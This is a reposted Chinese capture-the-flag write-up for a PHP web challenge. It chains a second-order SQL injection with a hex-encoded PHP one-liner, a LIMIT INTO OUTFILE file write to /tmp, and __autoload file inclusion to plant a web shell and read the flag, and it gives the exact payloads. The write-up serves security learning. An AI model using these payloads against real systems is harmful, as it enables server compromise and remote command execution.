转载

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

首先想说这是我见过的最绕的题目了,不得不说出题人的思路太猥琐。

首先在访问http://8ed0a7d1a5ed5b5ac.jie.sangebaimao.com/sangebaomao.zip得到源码。根据tips是二次注入还要getshell。看着就带劲。

一、 先看看文件吧

其中include.php做了为全局,而且GET、POST、COOKIE 用了addslashes转义,所以基本不能通过一次注入来货的shell,除非有些入库的变量没有单引号包裹。

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

看看main.php有个25行 

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

其中的limit后面的$num是来自 $_SESSION['limit'], 追溯$_SESSION['limit']最终来自的是用户注册,因为limit之后是可以执行into outfile的。这也算是一个知识点吧。所以我们能够通过注册的limit来控制写入的路径,那怎么控制写入的内容呢。很明显。我们只有从name 和 message字段下手。追溯这两个字段的来源。

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

name字段是由注册的时候nickname参数的先存入数据库,然后再查询出来的。 追溯到注册的代码才发现 $name htmlspecialchars() 实体化了, 所以 name 是不能直接引入 <符号 的。 $message 也被实体化了。但是要写入 php 代码是必须带着 < 符号的, 此处我懵逼了。

后来玉林嘎大牛提醒,用 0x, 他一说0x, 我马上反应过来再找个二次注入,让 message字段 入库的时候以 16 进制写进数据库,只要是没有单引号包裹的 16 进制最后入库都会还原成原本的字符串。

解开这个结的就是main.php中的 18 行的 sql 语句。

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

在这个 inster 语句中, $name 是注册的时候可控的。所以我们如果注册的时候,我把 name 注册成这样 aa ,0x3c3f70687020406576616c28245f504f53545b615d293b3f3e)# 

其中 16 进制是一句话的 hex 编码。这样的话 我们执行 insert into guestbook(`uid`,`name`, `message`) values('".$uid."','".$name."','".$message."') 的时候真正的数据库代码是 如下图的

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

# 之后的被注释, 0x3c3f70687020406576616c28245f504f53545b615d293b3f3e 就是字段 message 的值,而且是没有单引号包裹的。所以当我们执行了 insert 操作之后。m essage 字段的值就是 <?php eval($_POST[a]);?>了 ,那么当执行 select 操作语句的时候, message 是从数据库查询出来的所以不会被实体化,因此就可以 getshell 啦。听着是不是觉得好绕啊。

二、 

那么来讲是实现过程

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

Username password 填写正常。

nikname 填写 aa',0x3c3f70687020406576616c28245f504f53545b615d293b3f3e)#

limit 填写      10 into outfile 'd:/www/answer.php'

然后登陆,在留言板处 随便留一句。

来监控数据库看看 ,SQL 语句完美执行

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

来看看写入的文件,完美写入网站根目录

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

三、

到这里这里你觉得就 oK 了吗,然而并不是,最好玩的才刚开始。我在三个白帽的服务器上测试的时候怎么也写不进,然后去问了出题人是不是 web 目录不可写然后得到了答案不可写。

而且还提示要利用代码里面的 _autoload 函数的特性。后来去搜了搜特性,发现这是一个注册类的函数,在没有给定处理用函数数的情况下当你去实例化类的时候,就会直接包含目录下的与类名相同的 .php 文件或者是 .inc 文件。其实说简单点,就是这个函数可以包含文件。

然后我就去看了看题目的源代码,看在哪里调用了 _autoload 这个函数,这个函数是写在 include.php 中的,然后被 ini.php 包含 ,int.php 再然后被 main.phph 包含 在 main.php 中有一个类的实例化的操作

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

可以看到类名是 $action ,而 $action 是我们控的。看到这里,我的思路就明了啦。我们往一个可写目录写一个 php 文件,然后我们再把这个文件的完整目录和文件名传给 $action, 那么当 php 去实例化这个 $action 这个类的时候。就会自动包含我们穿上去的文件,那么我们就通过文件包含 getshell 啦。因为是 linux 的服务器,所以 /tmp 目录应该是可写的。所以真正的 palyload 出来了

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

nicknmae : 填成了 aa',0x3c3f70687020706870696e666f28293b3f3e)#   这是 phpinfo 16 进制,因为这样写的话可以很清楚的看到包含成功没有

Limit 10 into outfile '/tmp/answer.php'

然后登陆,随便发表评论。

最后访问 xxx.com/main.php?action=/tmp/answer

成功执行代码

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

那么可以就可以把 phpinfo 换成一句话写进去,此处有一个坑,就是必须在登录情况下才能访问到 shell 。如果你用菜刀的话,还要想办法带着 session 。所以我就直接写成了 <?php system($_POST[a]);?>,用火狐去发包

三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)

然后成功翻到flag

后记:只能说出题人太猥琐,而且确实太绕啦。不过确实很有趣,二次注入写shell加上利用特性,简直是极致。

原文  http://www.answ.cc/?post=19
正文到此结束
Loading...